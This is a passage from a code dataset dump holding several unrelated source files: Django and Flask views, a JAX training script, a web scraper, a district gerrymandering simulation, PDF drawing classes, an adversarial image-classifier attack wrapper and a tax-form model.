collection=collection),\n RL(url=\"item_new\",\n title=\"Dodaj nowy element kolekcji\",\n collection=collection)]\n # Zamień numer id kolekcji na obiekt\n collection = Collections.objects.get(pk=collection)\n #Utwórz listę elementów kolekcji do listy prawego menu\n scroll_menu = [item_obj.make_link() for item_obj in Items.objects.filter(collection=collection)]\n\n return render(request,\n self.view_template,\n {\"title\": self.TITLE + collection.name,\n \"buttons\": self.buttons + additional_buttons,\n \"scroll_menu\": scroll_menu,\n \"item\": Items.objects.get(pk=item),\n \"collection\": collection\n })\n\n def post(self, request, collection, item=None, *args, **kwargs):\n # Jeśli użytkownik potwierdził, usuń element kolekcji. Przypisane wartości kasują się automatycznie\n if request.POST.get(\"submit\", False) == \"Tak\":\n Items.objects.get(pk=item).delete()\n return redirect(reverse(\"collection_view\",\n kwargs={\"collection\": collection}))\n # Jeśli nie, odeślij do widoku tego elementu\n return redirect(reverse(\"item_view\",\n kwargs={\"collection\": collection,\n \"item\": item}))\n\n def dispatch(self, *args, **kwargs):\n return super(Item_Delete, self).dispatch(*args, **kwargs)\n\n\nclass Helper_Lists(View):\n \"\"\"\n @PODSUMOWANIE: Widok dodawania i edycji List Wartości Pomocniczych.\n @DANE: supp_list_id - numer id listy pomocniczej\n \"\"\"\n # TODO: filtorwanie list po ich kolekcjach\n # TODO: każda lista może mieć puste pole\n TITLE = u\"Listy pomocnicze\"\n SUBTITLE = u\"Wybierz listę pomocniczą do edycji z prawej strony lub utwórz nową poniżej.\"\n view_template = \"list_menu.html\"\n buttons = [Buttons.COLLECTION_SELECT, Buttons.LIST_MENU]\n VALUES_FORMSET = modelformset_factory(Support_Values,\n fields=[\"value\", \"support_table\"],\n widgets={\"support_table\": HiddenInput()},\n can_delete=True,\n extra=0,\n )\n class INFO():\n FAIL = \"Lista nie została zapisana.\"\n SUCCESS = \"Zmiany zostały poprawnie zapisane.\"\n SUCCESS_NEW = \"Lista została zapisana. Teraz można dodać elementy.\"\n\n def get(self, request, supp_list_id='', *args, **kwargs):\n if supp_list_id: # Jeśli numer podany, to edycja istniejącej listy\n # Wyciągnij obiekt z bazy danych\n support_table = Support_Tables.objects.get(pk=supp_list_id)\n # Zainicjuj formularz z podanego obiektu\n name_form = New_List_Form(instance=support_table)\n # Wypełnij zestaw wstępnymi danymi\n formset = self.VALUES_FORMSET(queryset=Support_Values.objects.filter(support_table=support_table))\n else: # Jeśli nie, to tworzenie nowej Listy Pomocniczej\n name_form = New_List_Form()\n formset = []\n #Utwórz listę elementów listy prawego menu z istniejących List Wartości\n scroll_menu = [item.make_link() for item in Support_Tables.objects.all()]\n\n return render(request,\n self.view_template,\n {\"title\": self.TITLE,\n \"buttons\": self.buttons,\n \"scroll_menu\": scroll_menu,\n \"new_list\": Buttons.LIST_NEW,\n \"name_form\": name_form,\n \"formset\": formset,\n \"supp_list_id\": supp_list_id,\n \"message\": self.SUBTITLE\n })\n\n def post(self, request, supp_list_id='', *args, **kwargs):\n message = ''\n if supp_list_id == '': # Nowa Lista Pomocnicza:\n # Utwórz formularz z danych przychodzących\n name_form = New_List_Form(data=request.POST)\n # Waliduj\n if name_form.is_valid():\n # Zapisz i utwórz stosowną informację\n support_table = name_form.save()\n message = self.INFO.SUCCESS_NEW\n else:\n message = self.INFO.FAIL\n # Wypełnij zestaw formularzy danymi wstępnymi\n formset = self.VALUES_FORMSET(queryset=Support_Values.objects.filter(support_table=support_table),\n initial=[{\"value\": item.value} for item in Support_Values.objects.filter(support_table=support_table)])\n supp_list_id = support_table.id\n else: # Edycja\n # Wyciągnij istniejącą Listę z bazy\n support_table = Support_Tables.objects.get(pk=supp_list_id)\n # Zainicjuj formularz tej listy\n name_form = New_List_Form(data=request.POST, instance=support_table)\n # Utwórz surowy formularz wartości listy\n formset = self.VALUES_FORMSET(request.POST,\n initial=[{\"support_table\": support_table} for _ in range(int(request.POST[\"form-TOTAL_FORMS\"]))],\n queryset=Support_Values.objects.filter(support_table=support_table)\n )\n # Waliduj obydwa i zapisz\n if name_form.is_valid() and formset.is_valid():\n name_form.save()\n formset.save()\n message = self.INFO.SUCCESS\n formset = self.VALUES_FORMSET(queryset=Support_Values.objects.filter(support_table=support_table),\n initial=[{\"value\": item.value} for item in Support_Values.objects.filter(support_table=support_table)])\n else:\n message = self.INFO.FAIL\n #Utwórz listę elementów listy prawego menu z istniejących List Wartości\n scroll_menu = [item.make_link() for item in Support_Tables.objects.all()]\n\n return render(request,\n self.view_template,\n {\"title\": self.TITLE,\n \"buttons\": self.buttons,\n \"scroll_menu\": scroll_menu,\n \"new_list\": Buttons.LIST_NEW,\n \"message\": message,\n \"name_form\": name_form,\n \"formset\": formset,\n \"supp_list_id\": supp_list_id\n })\n\n\n def dispatch(self, *args, **kwargs):\n return super(Helper_Lists, self).dispatch(*args, **kwargs)\n","sub_path":"main/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":29371,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"11886505","text":"from app.api import bp\nfrom flask import request, jsonify\nfrom app.models import Entry, cdict\nfrom flask_jwt_extended import jwt_required\n\n@bp.route('/entries', methods=['PUT'])\n@jwt_required\ndef edit_entry():\n\tj = request.json.get\n\tid = j('id')\n\tbody = j('body')\n\tverses = j('verses')\n\tname = j('name')\n\tEntry.edit(id, verses, name, body)\n\treturn jsonify({'yes': True})\n\n@bp.route('/entries', methods=['DELETE'])\n@jwt_required\ndef delete_entry():\n\tid = request.args.get('id')\n\tEntry.query.get(id).delete()\n\treturn jsonify({'yes': True})\n\n@bp.route('/entries/from_subtopic', methods=['GET'])\ndef get_entries_from_subtopic():\n\ta = request.args.get\n\tid = a('id')\n\tpage = a('page')\n\treturn jsonify(cdict(Entry.query.filter_by(subtopic_id=id), page))\n\n@bp.route('/entries', methods=['POST'])\n@jwt_required\ndef add_entry():\n\terrors = []\n\tj = request.json.get\n\tid = j('id')\n\tverses = j('verses')\n\tname = j('name')\n\tif Entry.query.filter_by(name=name).first():\n\t\terrors.append('Entry with that name already exists')\n\t\treturn jsonify({'errors': errors})\n\tbody = j('body')\n\tentry = Entry(verses, name, body, id)\n\treturn jsonify(entry.dict())\n\n@bp.route('/entries', methods=['GET'])\ndef get_entry():\n\tid = request.args.get('id')\n\treturn jsonify(Entry.query.get(id).dict())","sub_path":"app/api/entries.py","file_name":"entries.py","file_ext":"py","file_size_in_byte":1262,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"375822793","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Mar 10 07:36:39 2021\n\n@author: arnovel\n\"\"\"\nimport os\nimport pickle\nimport pandas as pd\nimport jax.numpy as jnp\nimport matplotlib.pyplot as plt\nimport haiku as hk\nimport jax\nimport optax\n\nfrom tqdm import tqdm\nfrom jax import grad, jit\nfrom jax.interpreters.xla import _DeviceArray\nfrom typing import TypeVar, Any, Tuple\n\n# types\n\nOptState = Any\narray = TypeVar(\"array\", bound=_DeviceArray)\n\n\n# init\n_seed = 101\nrng = jax.random.PRNGKey(_seed)\n## number of Gradient Descent updates\nmax_iters = int(5e02)\n## Gradient Descent Step Size\nstep_size = 1e-03\n_lambda, _mu = 100.0, 100.0\n## data path\ncurr_path = os.path.dirname(__file__)\ndata_path = os.path.join(curr_path, f\"data_seed_{_seed}.pkl\")\nparams_path = os.path.join(curr_path, f\"params_seed_{_seed}.pkl\")\n\n# funcs\n\ndef two_layers_net(width: int = 30,\n output_dim: int = 1\n ) -> hk.Module:\n '''\n A basic two layer network with ReLU activations\n '''\n network = hk.Sequential([\n hk.Linear(width), jax.nn.relu,\n hk.Linear(width), jax.nn.relu,\n hk.Linear(output_dim)\n ])\n \n return network\n\ndef net_evaluate(X: array,\n Y: array,\n width: int = 30,\n ) -> Tuple[array]:\n '''\n Evaluates the two networkx on data `X`, `Y`.\n '''\n output_dim = Y.shape[1]\n net_frwd = two_layers_net(width, output_dim)\n net_bkwd = two_layers_net(width, output_dim)\n \n Y_hat = net_frwd(X)\n X_hat = net_bkwd(Y)\n inv_X = net_bkwd(Y_hat)\n inv_Y = net_frwd(X_hat)\n \n return X_hat, Y_hat, inv_X, inv_Y\n \n\nif __name__ == '__main__':\n # load data\n data = pd.read_pickle(data_path)\n X = data['x'].values.reshape(-1,1)\n Y = data['y'].values.reshape(-1,1)\n # init net & opt\n net = hk.without_apply_rng(hk.transform(net_evaluate))\n opt = optax.adam(step_size)\n params = net.init(rng, X, Y)\n opt_state = opt.init(params)\n \n # define runtime routines\n \n def loss(params: hk.Params,\n X: array,\n Y: array,\n _lambda: float,\n _mu: float,\n ) -> array:\n \n X_hat, Y_hat, inv_X, inv_Y = net.apply(params, X,Y)\n \n avg_x_fit_sq_err = jnp.mean( (X_hat - X) ** 2 )\n avg_y_fit_sq_err = jnp.mean( (Y_hat - Y) ** 2 )\n avg_x_invfit_sq_err = jnp.mean( (inv_X - X) ** 2 )\n avg_y_invfit_sq_err = jnp.mean( (inv_Y - Y) ** 2 )\n \n _fit = avg_x_fit_sq_err + avg_y_fit_sq_err\n _inv_constraint = _lambda * avg_x_invfit_sq_err + _mu * avg_y_invfit_sq_err\n \n _loss = _fit + _inv_constraint\n \n return _loss\n \n @jit\n def update(params: hk.Params,\n opt_state: OptState,\n X: array,\n Y: array,\n ) -> Tuple[hk.Params, OptState]:\n \n grads = grad(loss)(params, X, Y, _lambda, _mu)\n updates, opt_state = opt.update(grads, opt_state)\n new_params = optax.apply_updates(params, updates)\n return new_params, opt_state\n \n hist_train = []\n # train for `max_iters` epochs\n for step in tqdm(range(max_iters)):\n _loss = loss(params, X, Y, _lambda, _mu)\n hist_train.append(_loss)\n params, opt_state = update(params, opt_state, X, Y)\n \n \n # plot train error as func(iter)\n plt.plot(hist_train)\n plt.show()\n \n # store params\n with open(params_path, mode='wb') as fp:\n pickle.dump(obj=params, file=fp)\n ","sub_path":"train_sample_constraint.py","file_name":"train_sample_constraint.py","file_ext":"py","file_size_in_byte":3568,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"412220589","text":"import matplotlib.pyplot as plt\nimport numpy as np\n\ncutoff_energy = np.genfromtxt('cutoff_energy.csv', delimiter=',')\ntotal_energy = np.genfromtxt('total_energy.csv', delimiter=',')\n\nN = len(total_energy)\nenergy_diff = np.zeros(N)\nmax_index = np.argmax(cutoff_energy)\n\nfor k in range(N-1):\n\tenergy_diff[k] = np.abs(total_energy[k] - total_energy[max_index])\n\nnp.delete(energy_diff, max_index)\nnp.delete(cutoff_energy, max_index)\n\nplt.plot(cutoff_energy, np.log10(energy_diff), 'ko')\nplt.plot(cutoff_energy, np.log10(0.00185*np.ones_like(energy_diff)))#Accounts for fact that there are 5 atoms\nplt.xlabel('Cutoff energy (Ry)')\nplt.ylabel('log(Energy difference) (Ry)')\nplt.show()\n","sub_path":"convergence/ecutwfc/cutoff_plotter.py","file_name":"cutoff_plotter.py","file_ext":"py","file_size_in_byte":679,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"434782278","text":"''' scrape_html3 - Complete example'''\n\n# third-party libraries\nimport requests\nfrom bs4 import BeautifulSoup\nimport custom\n\nURL = 'http://graduate.kennesaw.edu/datascience/students.php'\n\n# retrieve web page and parse\nresponse = requests.get(URL)\nsoup = BeautifulSoup(response.content, 'lxml')\n\n# find the relevant blocks of HTML\ninfo_blocks = soup.findAll('div', {'class':'more_info'})\n\n# then descend and extract\nfor info in info_blocks:\n title_div = info.find_previous_sibling('div')\n title = title_div.span.text.strip()\n print(title)\n \n for li in info.ul.findAll('li'):\n print(li.text.strip())\n print()\n","sub_path":"scrape_html3.py","file_name":"scrape_html3.py","file_ext":"py","file_size_in_byte":632,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"80"} +{"seq_id":"320944505","text":"# pylint: disable=missing-docstring\nimport functools\n\nfrom src.database.db_handler import db_session\nfrom src.database.db_helper import get_results_from_table, get_county_geojson\nfrom src.database.models import Diff, MergedDistrictDiff, MergedDistrict\n\n\ndef gerrymander(party, bwk, new_county, old_county, original_size, diffs, county_result, results):\n steps = []\n\n # We try to expand our new county to a reasonable size...\n counter = 1\n while new_county and counter < original_size:\n new_new_county = []\n for district in new_county:\n if not district.neighbours:\n district.fill_neighbours()\n # ...by searching the neighbours of our glorious new county\n own_diff, own_bwk = get_bwk_and_diff(district, diffs)\n d_neighbours = get_neighbours(district, diffs,\n lambda n_district, n_bwk:\n any(b_d.identifier == n_district.identifier for b_d in old_county)\n or own_bwk != n_bwk)\n for neighbour, neighbour_diff, neighbour_bwk in d_neighbours:\n # Calculate the new result\n new_county_result = get_new_results(neighbour, county_result)\n new_neighbour_county_result = get_new_results(neighbour, results[neighbour_bwk], factor=-1)\n neighbour_county_winner = get_winning_party(results[neighbour_bwk])\n\n # Check if still win with this new district and that the old county's result is not changed\n if check_winning_party(new_county_result, party) and \\\n (neighbour_bwk == bwk or\n check_winning_party(new_neighbour_county_result, neighbour_county_winner)):\n counter += 1\n add_district_to_bwk(neighbour, bwk, diffs, neighbour_diff)\n steps.append({'action': 'grow', 'targets': get_county_geojson({neighbour_bwk, bwk})})\n new_new_county.append(neighbour)\n county_result = new_county_result\n if neighbour_bwk != bwk:\n results[neighbour_bwk] = new_neighbour_county_result\n\n oc_district = next((x for x in old_county if x.identifier == neighbour.identifier), None)\n if oc_district:\n old_county.remove(oc_district)\n\n new_county = new_new_county\n\n forced = False\n\n # Check if we still have districts we have to move around\n while old_county:\n changed = False\n for district in old_county:\n\n if district.neighbours is None:\n district.fill_neighbours()\n\n # Check if we got a diff for the current district to check our districts current BWK\n own_diff, own_bwk = get_bwk_and_diff(district, diffs)\n\n # Search for neighbours who are in a different BWK\n d_neighbours = get_neighbours(district, diffs, lambda _, n_bwk: own_bwk != n_bwk)\n\n for neighbour, neighbour_diff, neighbour_bwk in d_neighbours:\n # Try to make sure that the result in the neighbours BWK is unchanged when we add this district\n old_winner = sorted(results[neighbour_bwk], key=lambda x: x[1], reverse=True)[0][0]\n n_results = neighbour.get_result_dict()\n # Add the votes of this district to the total result of the bwk\n for key in n_results.keys():\n results[neighbour_bwk][key] += n_results[key]\n # If the result in the BWK is unchanged\n if forced or sorted(results[neighbour_bwk], key=lambda x: x[1], reverse=True)[0][0] == old_winner:\n add_district_to_bwk(district, neighbour_bwk, diffs, own_diff)\n old_county.remove(district)\n steps.append({'action': 'cleanup', 'targets': get_county_geojson({neighbour_bwk, bwk})})\n changed = True\n forced = False\n\n break\n else:\n for key in n_results.keys():\n results[neighbour.bwk][key] -= n_results[key]\n # If we didn't find the perfect candidate just force the addition to the\n # first potential BWK and try again\n if not changed:\n forced = True\n\n return steps\n\n\ndef get_gerrymandering_steps(bwk, party):\n # Yay for local functions!\n # Sort bwk districts by their results\n def district_comparator(d1, d2):\n d1_party_result = d1.get_result_dict()[party]\n d2_party_result = d2.get_result_dict()[party]\n sorted_d1_tuples = sorted(d1.get_result_dict().items(), key=lambda d: d[1], reverse=True)\n sorted_d2_tuples = sorted(d2.get_result_dict().items(), key=lambda d: d[1], reverse=True)\n d1_to_first = sorted_d1_tuples[0][1] - d1_party_result\n d1_to_second = sorted_d1_tuples[1][1] - d1_party_result\n d2_to_first = sorted_d2_tuples[0][1] - d2_party_result\n d2_to_second = sorted_d2_tuples[1][1] - d2_party_result\n\n if d1_to_first > d2_to_first:\n return 1\n elif d1_to_first < d2_to_first:\n return -1\n else: # When the party we look at has the most votes\n # Look at the distance to the second place\n if d1_to_second > d2_to_second:\n return 1\n elif d1_to_second < d2_to_second:\n return -1\n else: # If this should be miraculously the same check for the largest value\n if d1_party_result > d2_party_result:\n return -1\n elif d1_party_result < d2_party_result:\n return 1\n else:\n return 0\n\n steps = []\n districts = MergedDistrictDiff.query.all()\n original_bwk_districts = MergedDistrict.query.filter(MergedDistrict.bwk == bwk).all()\n diffs = Diff.query.all()\n results = get_results_from_table(MergedDistrictDiff)\n old_county = [district for district in districts if district.bwk == bwk]\n county_result = {key: 0 for key in districts[0].get_result_dict().keys()}\n if old_county:\n # Sort by highest delta\n old_county = sorted(old_county, key=functools.cmp_to_key(district_comparator))\n append_search_step(old_county, steps)\n new_county_result = get_new_results(old_county[0], county_result)\n if check_winning_party(new_county_result, party):\n steps[len(steps) - 1]['winner'] = old_county[0].identifier\n return steps + gerrymander(party, bwk, [old_county[0]], old_county[1:], len(original_bwk_districts), diffs,\n new_county_result, results)\n\n # If we found no working solution\n # check if we find a good seed in the original district\n original_bwk_districts = sorted(original_bwk_districts, key=functools.cmp_to_key(district_comparator))\n append_search_step(original_bwk_districts, steps)\n new_county_result = get_new_results(original_bwk_districts[0], county_result)\n if check_winning_party(new_county_result, party):\n original_district_bwk = get_bwk_and_diff(original_bwk_districts[0], diffs)[1]\n results[original_district_bwk] = get_new_results(districts[0], results[original_district_bwk],\n factor=-1)\n add_district_to_bwk(original_bwk_districts[0], bwk, diffs)\n steps[len(steps) - 1]['winner'] = original_bwk_districts[0].identifier\n return steps + gerrymander(party, bwk, [original_bwk_districts[0]], old_county, len(original_bwk_districts),\n diffs, new_county_result, results)\n\n # If this does not work either check if we find any district anywhere\n # By checking the neighbours of the original district and then branching outward\n alreadychecked = set([district.identifier for district in original_bwk_districts])\n check_for_neighbours = original_bwk_districts\n while check_for_neighbours:\n districts_to_check = []\n for district in check_for_neighbours:\n districts_to_check += get_neighbours(district, diffs,\n lambda neighbour, _:\n neighbour not in districts_to_check\n and neighbour.identifier not in alreadychecked)\n\n append_search_step(districts, steps)\n for district, _, district_bwk in districts_to_check:\n new_county_result = get_new_results(district, county_result)\n if check_winning_party(new_county_result, party):\n results[district_bwk] = get_new_results(district, results[district_bwk], factor=-1)\n add_district_to_bwk(district, bwk, diffs)\n steps[len(steps) - 1]['winner'] = district.identifier\n return steps + gerrymander(party, bwk, [district], old_county, len(original_bwk_districts), diffs,\n new_county_result, results)\n\n check_for_neighbours = districts_to_check\n\n # If we haven't found any suitable candidate return\n # the search steps we have taken\n return steps\n\n\ndef append_search_step(candidates, steps):\n steps.append({'action': 'search', 'candidates': [district.identifier for district in candidates]})\n\n\ndef check_winning_party(voting_results, party):\n if any(value > 0 for value in voting_results.values()):\n return get_winning_party(voting_results) == party\n else:\n return False\n\n\ndef get_winning_party(voting_results):\n return sorted(voting_results.items(), key=lambda x: x[1], reverse=True)[0][0]\n\n\ndef get_new_results(district, sums, factor=1):\n nc_results = district.get_result_dict()\n new_sums = sums.copy()\n for key in sums.keys():\n new_sums[key] += nc_results[key] * factor\n return new_sums\n\n\ndef get_neighbours(district, diffs, filter_function):\n # Get all neighbours that are not in the current districts BWK\n d_neighbours = []\n if not district.neighbours:\n district.fill_neighbours()\n\n for n in district.neighbours:\n n_diff, n_bwk = get_bwk_and_diff(n, diffs)\n if filter_function(n, n_bwk):\n d_neighbours.append((n, n_diff, n_bwk))\n return d_neighbours\n\n\ndef add_district_to_bwk(target_district, target_bwk, diffs, district_diff=None):\n if not district_diff:\n district_diff = get_bwk_and_diff(target_district, diffs)[0]\n\n # Check if we got a diff already\n if district_diff:\n if target_bwk == target_district.bwk:\n diffs.remove(district_diff)\n db_session.delete(district_diff)\n else:\n district_diff.bwk = target_bwk\n\n # ... if not add one\n elif target_bwk != target_district.bwk:\n target_diff = Diff(target_district.identifier, target_bwk)\n db_session.add(target_diff)\n diffs.append(target_diff)\n\n db_session.commit()\n\n\n# Returns the districts diff entry and current BWK\ndef get_bwk_and_diff(district_to_check, diffs):\n loc_diff = next((x for x in diffs if x.identifier == district_to_check.identifier), None)\n\n if loc_diff:\n loc_bwk = loc_diff.bwk\n else:\n loc_bwk = district_to_check.bwk\n\n return loc_diff, loc_bwk\n\n\nif __name__ == '__main__':\n get_gerrymandering_steps('083', 'gruene')\n","sub_path":"src/database/gerrymandering_helper.py","file_name":"gerrymandering_helper.py","file_ext":"py","file_size_in_byte":11488,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"80"} +{"seq_id":"137714681","text":"# -*- coding: utf-8 -*-\n\n\nfrom globals import *\nfrom tools import translate_color, canvas_reset\n\n\n\nclass Figure:\n def __init__(self, _id, x, y):\n self.id = _id\n self.type = 'None'\n self.x = x * PT #posicion X\n self.y = y #posicion Y\n\n\n def is_rect(self):\n \"\"\"\n Si es un objecto rectangulo\n \"\"\"\n if self.type == 'Rect':\n return True\n else:\n return False\n\n\n def is_text(self):\n \"\"\"\n Si es un objecto Texto\n \"\"\"\n if self.type == 'Text':\n return True\n else:\n return False\n\n\n\nclass Rect(Figure):\n def __init__(self, _id, x, y, w, h, lw=LINEWEIGHT,c=COLOR, sc=STROKECOLOR, bg=BACKGROUNDCOLOR):\n \"\"\"\n en cuanto a posicion y tamaño se expecifica en pt\n \"\"\"\n Figure.__init__(self, _id, x, y)\n self.type = 'Rect'\n self.w = w * PT #normalizo el ancho\n self.h = h #alto\n self.lw = lw * PT #ancho de linea normalizado\n self.c = c #color\n self.sc = sc #stroke color\n self.bg = bg #color de fondo o relleno\n\n self.y = (HEIGHT * PX) - self.y - self.h\n self.y = self.y * PT\n self.h = self.h * PT\n\n\n def draw(self, canvas):\n canvas_reset(canvas)#reseteo colores\n #setcolors\n sc = translate_color(self.sc)\n canvas.setStrokeColorRGB(sc[R],sc[G], sc[B])\n #ancho linea\n if self.lw != 0:\n _stroke = 1\n canvas.setLineWidth(self.lw)\n else:\n _stroke=1\n\n #draw\n if self.bg == \"none\":\n canvas.rect(self.x, self.y, self.w, self.h, stroke = _stroke)\n else:\n bg = translate_color(self.bg)\n canvas.setFillColorRGB(bg[R], bg[G], bg[B])\n canvas.rect(self.x, self.y, self.w, self.h, stroke = _stroke, fill=1)\n\n\n def __str__(self):\n return \"RECT(%s %s %s %s | %s %s %s)\" %(self.x, self.y, self.w, self.h, self.lw, self.sc, self.bg)\n\n\n\nclass Label(Figure):\n def __init__(self, _id, x, y, text=\"\", font=FONTFAMILY, size=12, index=False, c=COLOR, sc=STROKECOLOR, bg=BACKGROUNDCOLOR):\n \"\"\"\n en cuanto a posicion y tamaño se expecifica en pt\n \"\"\"\n Figure.__init__(self, _id, x, y)\n self.type = 'Text'\n self.font = font\n self.size = size #tamaño texto en pixel\n self.text = text #texto\n self.index = index #si se usara como indice de relleno no imprimira el texto\n self.c = c #color\n self.sc = sc #stroke color\n self.bg = bg #color de fondo o relleno\n\n self.y = (HEIGHT * PX) - self.y # - self.size\n self.y = self.y * PT\n self.size = self.size * PT\n\n def draw(self, canvas):\n #si es una etiqueta indice no se dibujara\n if not self.index:\n canvas_reset(canvas)#reseteo colores\n #setcolors\n sc = translate_color(self.sc)\n canvas.setStrokeColorRGB(sc[R],sc[G], sc[B])\n bg = translate_color(self.bg)\n canvas.setFillColorRGB(bg[R], bg[G], bg[B])\n #font configuration\n canvas.setFont(self.font, self.size)\n canvas.drawString(self.x, self.y, self.text)\n\n\n\n def __str__(self):\n return \"TEXT (%s %s %s %s)\" %(self.x, self.y, self.text, self.size)\n\n\n\nclass Line(Figure):\n pass\n\n\n\nclass Elipse(Figure):\n pass","sub_path":"backup/figures.py","file_name":"figures.py","file_ext":"py","file_size_in_byte":3426,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"80"} +{"seq_id":"318262246","text":"import numpy as np\nfrom .PQP import PQP\n\ndef attack_classifier(forward, model, ori_label, data_generator, iter_time,hard_attack=True, loss_goal=0.9, N=20):\n query_fun = lambda img: forward(model, img)\n mean = lambda x: np.asarray(x).mean()\n success, ssim, psnr, NQ = [], [], [], []\n adv_images = np.copy(data_generator)\n num_imgs = data_generator.shape[0]\n for i in range(num_imgs):\n img = data_generator[i]\n label = ori_label[i]\n probs = forward(model, img)\n loss_goal_ = loss_goal\n preds = np.argsort(probs)\n if hard_attack:\n target = preds[0] # last predicted class\n print('*** Attacking image %d, original label %d, target label %d ***' % (i+1, label, target))\n print_every = iter_time *10\n else:\n target = preds[-2] # 2nd predicted class\n print('*** Attacking image %d, original label %d, target label %d ***' % (i+1, label, target))\n print_every = iter_time\n\n # start attack\n newImg, success_, ssim_, psnr_, NQ_, _ = PQP(int(ori_label[i]) ,query_fun=query_fun, or_img=img, target=target, loss_goal=loss_goal_, N=N,\n minimize_loss=False, print_every=print_every)\n newImg = np.uint8(newImg)\n adv_images[i] = newImg\n\n if(success_):\n success.append(1)\n else:\n success.append(0)\n ssim.append(ssim_)\n psnr.append(psnr_)\n NQ.append(NQ_)\n print('\\n***Ending**')\n print('*** Success %d/%d, average ssim: %0.3f'\n % (sum(success), num_imgs, mean(ssim)))\n return adv_images, ssim, success","sub_path":"backEnd/toolkit/attacks/SSIM_attack_back/PQP_attack.py","file_name":"PQP_attack.py","file_ext":"py","file_size_in_byte":1668,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"80"} +{"seq_id":"236540205","text":"from django.db import models\n\nclass model1040NREZ(models.Model):\n refnum = models.IntegerField(\"Reference Number\", default=0)\n\n F1040NREZL01 = models.BooleanField(\"Single nonresident alien\", default=False)\n F1040NREZL02 = models.BooleanField(\"Married nonresident alien\", default=False)\n F1040NREZL03 = models.IntegerField(\"Wages, salaries, tips, etc. Attach Form(s) W-2\", default=0)\n F1040NREZL04 = models.IntegerField(\"Taxable refunds, credits, or offsets of state and local income taxes\", default=0)\n F1040NREZL05 = models.IntegerField(\"Scholarship and fellowship grants. Attach Form(s) 1042-S or required statement\", default=0)\n F1040NREZL06 = models.IntegerField(\"Total income exempt by a treaty from page 2, Item J(1)(e)\", default=0)\n F1040NREZL07 = models.IntegerField(\"Add lines 3, 4, and 5\", default=0)\n F1040NREZL08 = models.IntegerField(\"Scholarship and fellowship grants excluded\", default=0)\n F1040NREZL09 = models.IntegerField(\"Student loan interest deduction\", default=0)\n F1040NREZL10 = models.IntegerField(\"Subtract the sum of line 8 and line 9 from line 7. This is your adjusted gross income\", default=0)\n F1040NREZL11 = models.IntegerField(\"Itemized deductions\", default=0)\n F1040NREZL12 = models.IntegerField(\"Subtract line 11 from line 10\", default=0)\n F1040NREZL13 = models.IntegerField(\"Exemption\", default=0)\n F1040NREZL14 = models.IntegerField(\"Taxable income. Subtract line 13 from line 12. If line 13 is more than line 12, enter -0-\", default=0)\n F1040NREZL15 = models.IntegerField(\"Tax. Find your tax in the Tax Table on pages 17 through 25\", default=0)\n F1040NREZL16 = models.IntegerField(\"Unreported social security and Medicare tax from Form:\", default=0)\n F1040NREZL16a = models.IntegerField(\"Form 4137\", default=0)\n F1040NREZL16b = models.IntegerField(\"Form 8919\", default=0)\n F1040NREZL17 = models.IntegerField(\"Add lines 15 and 16. This is your total tax\", default=0)\n F1040NREZL18a = models.IntegerField(\"Federal income tax withheld from Form(s) W-2 and 1099-R\", default=0)\n F1040NREZL18b = models.IntegerField(\"Federal income tax withheld from Form(s) 1042-S\", default=0)\n F1040NREZL19 = models.IntegerField(\"2013 estimated tax payments and amount applied from 2012 return\", default=0)\n F1040NREZL20 = models.IntegerField(\"Credit for amount paid with Form 1040-C\", default=0)\n F1040NREZL21 = models.IntegerField(\"Add lines 18a through 20. These are your total payments\", default=0)\n F1040NREZL22 = models.IntegerField(\"If line 21 is more than line 17, subtract line 17 from line 21. This is the amount you overpaid\", default=0)\n F1040NREZL23a = models.IntegerField(\"Amount of line 22 you want refunded to you.\", default=0)\n F1040NREZL23b = models.IntegerField(\"Routing number\", default=0)\n F1040NREZL23c = models.IntegerField(\"Checking or Savings\", default=0)\n F1040NREZL23d = models.IntegerField(\"Account number\", default=0)\n F1040NREZL23e = models.IntegerField(\"If you want your refund check mailed to an address outside the United States not shown above, enter that address here:\", default=0)\n F1040NREZL24 = models.IntegerField(\"Amount of line 22 you want applied to your 2014 estimated tax\", default=0)\n F1040NREZL25 = models.IntegerField(\"Amount you owe. Subtract line 21 from line 17. For details on how to pay, see instructions\", default=0)\n F1040NREZL26 = models.IntegerField(\"Estimated tax penalty (see instructions)\", default=0)\n \n # label not required here, since the modelPostTaxInput already has it, which gets passed to postTaxInputForm\n # null=True is for database, blank=True is for form validation\n # since boolean does not accept null, use default=False \n F1040NREZSCHOILA = models.CharField(max_length=128)\n F1040NREZSCHOILB = models.CharField(max_length=128)\n F1040NREZSCHOILC = models.BooleanField(default=False)\n F1040NREZSCHOILD1 = models.BooleanField(default=False)\n F1040NREZSCHOILD2 = models.BooleanField(default=False)\n F1040NREZSCHOILE = models.CharField(max_length=128)\n F1040NREZSCHOILF = models.BooleanField(default=False)\n F1040NREZSCHOILFc = models.CharField(max_length=128)\n F1040NREZSCHOILGa = models.BooleanField(default=False)\n F1040NREZSCHOILGb = models.BooleanField(default=False)\n F1040NREZSCHOILGc = models.DateField(null=True)\n F1040NREZSCHOILGd = models.DateField(null=True)\n F1040NREZSCHOILHa = models.IntegerField(null=True)\n F1040NREZSCHOILHb = models.IntegerField(null=True)\n F1040NREZSCHOILHc = models.IntegerField(null=True)\n F1040NREZSCHOILI = models.BooleanField(default=False)\n F1040NREZSCHOILIc = models.CharField(max_length=128)\n \n # Info fields\n INFOL01 = models.CharField(\"Your first name and initial\", max_length=128)\n INFOL02 = models.CharField(\"Last name\", max_length=128)\n INFOL04 = models.CharField(max_length=128, null=True)\n INFOL05 = models.CharField(max_length=128, null=True)\n INFOL06 = models.CharField(max_length=128, null=True)\n INFOL07 = models.CharField(max_length=128, null=True)\n INFOL08 = models.CharField(max_length=128, null=True)\n INFOL09 = models.BooleanField(default=False)\n INFOL10 = models.CharField(max_length=128, null=True)\n INFOL11 = models.CharField(max_length=128, null=True)\n INFOL12 = 